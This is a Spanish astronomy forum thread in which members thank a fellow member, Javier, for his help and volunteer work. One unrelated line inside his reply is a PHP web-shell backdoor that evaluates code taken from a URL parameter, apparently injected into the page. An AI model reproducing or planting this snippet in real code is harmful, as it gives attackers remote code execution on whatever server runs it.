Gracias javier.

Preguntas básicas sobre astronomía
Responder
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Gracias javier.

Mensaje por Manuelariza »

Como no encontraba el lugar,abro aquí este post,igual que hace no mucho tiempo se abrió un post en el foro de Hubble homenajeando a Patricio (Arbacia),quiero hacer lo mismo con nuestro compañero y amigo Javier(M3ntol) yo tengo mis razones particulares,me ayudo muchisimo en los comienzos en el foro de Hubble,gracias a su intervención sigo en el,de echo ya a pasado casi un año de esto y casi 1000 mensajes,pero no solo es esa la razón,sabemos que Javier siempre a estado hay para echar una mano y ayudar a lo que fuera y siempre por el interés del foro y de sus foreros,por eso creo que se merece nuestra gratitud.

Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Avatar de Usuario
Arbacia
Mensajes: 1185
Registrado: Vie Ago 31, 2007 2:50 pm

Gracias javier.

Mensaje por Arbacia »

Desde luego, Javi se merece algo más que unas líneas en este hilo.

Manuel, le tendremos que invitar a algo más contundente...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Gracias javier.

Mensaje por m3ntol »

Vaya,
esto si que no me lo esperaba :)
pues muchas gracias pero, de verdad que no hace falta. Además estos ` homenajes` suenan a jubilación y cosas así je je je y pienso seguir por aquí mucho tiempo.

Muchas gracias compañeros
PD:Luego os aflojo la pasta acorada je je je
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Gracias javier.

Mensaje por Manuelariza »

[quote="m3ntol"]Vaya,
esto si que no me lo esperaba :)
pues muchas gracias pero, de verdad que no hace falta. Además estos ` homenajes` suenan a jubilación y cosas así je je je y pienso seguir por aquí mucho tiempo.

Muchas gracias compañeros
PD:Luego os aflojo la pasta acorada je je je[/quote]

Anda,anda,que te has emocionado,lo de la pasta no es mala idea.
Se hacen homenajes en el foro por tantos
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Gracias javier.

Mensaje por vakaloura »

Ains!! Qué bonicoooooo...!!

Coincido con Manolo en lo dicho (Que siempre es de agradecer tener a una persona maja al lado)peeeeeeeeeeeeroo.....si nos vamos de cañas/tapas al Javier habrá que tenerlo atado para que no se nos escaquee a la francesa :twisted:

Un saludo majísimos!!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Gracias javier.

Mensaje por javi »

En mi caso cuando fui a la sede para informarme no esperaba una persona cordial y tengo que agradercerle lo bien que se porta por lo menos conmigo y por lo que veo con los demás ni que decir tiene. Lo mismo tengo que decir de Patricio que el primer dia que saque el CPC no solo me lo puso en estación sino que me enseño a ponerlo con una pedagogia que mas quisieran muchos Astrofísicos profesionales quisieran tener. Un achuchon a los dos.

Y por su puesto a Mario, Manuel y Alexis que son las personas que mas he rozado a parte de Javi y que son de P__a madre.

Un abrazote.
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Gracias javier.

Mensaje por rviper »

Mi primer acercamiento a serio a la astronomia fue el año pasado en El Cerro, en una reunion familiar que organizo Javier a la que nos "acoplamos" Manuel y yo. Pese a ser asi de familiar se porto muy bien.

Y a parte del trato personal que tiene con nosotros, el curro que lleva encima colaborar con Astrotiermes, Navas... y Astromad de forma desinteresada tampoco dbe olvidarse.

Asi que yo tambien me uno al homenaje porque lo tiene bien merecido.


Lo de Patricio creo que es un caso aparte, digno de un estudio somero. Tambien gracias por la paciencia que tienes con nosotros.

Un saludo
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
Responder